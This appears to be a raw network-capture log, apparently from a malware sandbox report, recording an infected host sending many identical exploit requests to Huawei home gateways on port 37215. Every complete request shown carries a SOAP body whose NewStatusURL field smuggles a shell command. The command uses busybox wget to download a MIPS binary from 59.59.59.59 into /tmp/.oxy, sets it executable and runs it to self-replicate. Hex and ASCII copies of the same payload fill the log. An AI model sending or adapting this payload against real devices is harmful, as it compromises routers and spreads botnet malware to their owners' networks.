                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          800192.168.2.1533330157.242.65.15537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.670392990 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          801192.168.2.154698041.170.208.15037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.670419931 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          802192.168.2.1542034157.220.42.20237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.670447111 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          803192.168.2.155499041.64.108.19037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.670465946 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          804192.168.2.153933275.30.52.3637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.675236940 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          805192.168.2.155668041.35.146.18637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.675288916 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          806192.168.2.155619641.135.160.5137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.675321102 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          807192.168.2.154079872.151.104.15337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.675395012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          808192.168.2.154367441.191.99.8937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.675417900 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          809192.168.2.1560624157.102.93.2537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.675592899 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
